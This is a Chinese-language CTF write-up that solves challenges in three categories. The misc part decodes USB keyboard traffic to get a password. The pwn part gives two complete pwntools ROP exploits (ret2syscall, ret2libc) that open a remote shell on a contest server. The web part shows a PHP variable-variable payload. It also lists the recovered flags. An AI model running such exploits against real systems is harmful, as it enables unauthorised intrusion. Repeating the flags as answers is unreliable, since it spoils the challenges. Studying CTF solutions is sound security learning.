结营赛wp

最终排名第10,还可以吧

##misc

签到

hsnctf{welcome_to_hsnctf}

easyusb

打开压缩包发现,一个流量包和一个flag.zip加密

应该是通过流量包得到密码解得flag

流量包是键盘流量

1
─$ tshark -T json -r usb.pcapng > test.json

手动提取键盘流量

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
00:00:16:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:08:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:06:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:1f:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:08:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:17:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:0e:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:20:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:1c:00:00:00:00:00
00:00:00:00:00:00:00:00

之后利用脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
mappings = { 0x04:"A",  0x05:"B",  0x06:"C", 0x07:"D", 0x08:"E", 0x09:"F", 0x0A:"G",  0x0B:"H", 0x0C:"I",  0x0D:"J", 0x0E:"K", 0x0F:"L", 0x10:"M", 0x11:"N",0x12:"O",  0x13:"P", 0x14:"Q", 0x15:"R", 0x16:"S", 0x17:"T", 0x18:"U",0x19:"V", 0x1A:"W", 0x1B:"X", 0x1C:"Y", 0x1D:"Z", 0x1E:"1", 0x1F:"2", 0x20:"3", 0x21:"4", 0x22:"5",  0x23:"6", 0x24:"7", 0x25:"8", 0x26:"9", 0x27:"0", 0x28:"\n", 0x2a:"[DEL]",  0X2B:"    ", 0x2C:" ",  0x2D:"-", 0x2E:"=", 0x2F:"[",  0x30:"]",  0x31:"\\", 0x32:"~", 0x33:";",  0x34:"'", 0x36:",",  0x37:"." }
nums = []
keys = open('usbdata.txt')
for line in keys:
    if line[0]!='0' or line[1]!='0' or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0':
         continue
    nums.append(int(line[6:8],16))
keys.close()
output = ""
for n in nums:
    if n == 0 :
        continue
    if n in mappings:
        output += mappings[n]
    else:
        output += '[unknown]'
print('output :\n' + output)

得到密码为SEC2ETK3Y(大写),解开压缩包得到flag

1
hsnctf{y0u_can_g4t_easy_usb}

##pwn

ret2syscall

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
from LibcSearcher import*
from pwn import *
# from ctypes import *
context(arch='amd64',os='linux',log_level='debug')

r = remote('58.240.236.231',49003)

# r = gdb.debug('./bheap')
# r = process('pwn')
# libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
# libc = ELF('/home/h711/tools/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')
elf = ELF('pwn')
# ld-linux-x86-64.so.2
# srand = libc.srand(libc.time(0)) #设置种子

se      = lambda data               :r.send(data)
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims             :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, b'\0'))
uu64    = lambda data               :u64(data.ljust(8, b'\0'))
lic 	= lambda data               :uu64(ru(data)[-6:])
pack    = lambda str, addr          :p32(addr)
padding = lambda lenth              :b'aaaaa'*(lenth//5)+b'F'*(lenth % 5)
it      = lambda                    :r.interactive()

rax = 0x0000000000400721 #: pop rax ; ret
rdx = 0x0000000000400721 #: pop rdx ; ret
rsi = 0x000000000400735 #: pop rsi ; ret
rdx = 0x000000000400735	#:  pop rdx ; ret
ret = 0x0000000000400509 #: ret
binsh = 0x0000000000601048 #: /bin/sh
syscall = 0x000000000400741
rdi = 0x000000000040072b #: pop rdi ; ret

pl = b'a'*0x48 + p64(rax) + p64(0x3b) + p64(rsi) + p64(0) + p64(rdx) + p64(0) + p64(rdi) + p64(binsh) + p64(syscall)
sl(pl)

it()

hsnctf{85ef9d72-c603-17df-59bc}

ret2libc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
from LibcSearcher import*
from pwn import *
# from ctypes import *
context(arch='amd64',os='linux',log_level='debug')

r = remote('58.240.236.231',49002)

# r = gdb.debug('./bheap')
# r = process('1')
# libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
# libc = ELF('/home/h711/tools/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')
elf = ELF('1')
# ld-linux-x86-64.so.2
# srand = libc.srand(libc.time(0)) #设置种子

se      = lambda data               :r.send(data)
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims             :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, b'\0'))
uu64    = lambda data               :u64(data.ljust(8, b'\0'))
lic 	= lambda data               :uu64(ru(data)[-6:])
pack    = lambda str, addr          :p32(addr)
padding = lambda lenth              :b'aaaaa'*(lenth//5)+b'F'*(lenth % 5)
it      = lambda                    :r.interactive()

main = elf.sym['vul']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
rdi = 0x0000000000400783
ret = 0x0000000000400509
rc()
pl = 0xD8*b'a' + p64(ret) + p64(rdi) + p64(puts_got) + p64(puts_plt)  + p64(main)
sl(pl)
# print(rc())
put_addr = lic('\x7f')

print('put====>',hex(put_addr))
libc = LibcSearcher('puts',put_addr)
base = put_addr - libc.dump('puts')
system = base + libc.dump('system')
binsh = base + libc.dump('str_bin_sh')

pl2 = b'a'*0xD8 + p64(ret) + p64(rdi) + p64(binsh) + p64(system)
sl(pl2)

it()


# sl()

hsnctf{04b4cfca-db86-486b-14b2}

web

###git

https://blog.csdn.net/m0_62879498/article/details/124586653借鉴原题

Git扫描后发现git泄露

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
<?php

include 'flag.php';
print_r($flag);

$yds = "dog";
$is = "cat";
$handsome = 'yds';

foreach($_POST as $x => $y){  // $键 = $值的值
    $$x = $y;  
    
}

foreach($_GET as $x => $y){
    $$x = $$y;// $handsome = flag的值  --->   $handsome = $flag  --> $x=handsome & $y=flag
}

 // 需要不满足以下几个条件
foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){  //不能同时 flag的值等于某个键名,那个键值又是flag
        exit($handsome);
    }
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){// 不能同时  GET 和 POST 都没设置 flag
    exit($yds);
}

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){// 任意都不能满足 flag === 'flag'
    exit($is);
}

echo "the flag is: ".$flag;

利用条件:

if($_GET[‘flag’] === $x && $x !== ‘flag’){ //不能同时 flag的值等于某个键名,那个键名又是flag, 就是 flag=a && a!=flag啊,这样就能进了 ?flag=(不是flag)&(不是flag)=xxx
进入条件十分简单:?flag=a&a=flag 即可
函数判断到 a=flag 的时候, $_GET[‘flag’] === $x && $x !== ‘flag’ –> a === a && a !== ‘flag’ 这就进来了 true && true 就进来了, 然后 exit($handsome);
因为要 exit($handsome); 那么我们要做的就是 让$handsome = $flag get 条件的处理如下:

​ foreach($_GET as $x => $y){
​ $$x = $$y;// $handsome = flag的值 —> $handsome = $flag –> $x=handsome & $y=flag
​ }

$$x = $$y而我们要的结果是$handsome = $flag那么特简单 让 ​x=handsome 和 $y=flag即可

playload:?handsome=flag&flag=b&b=flag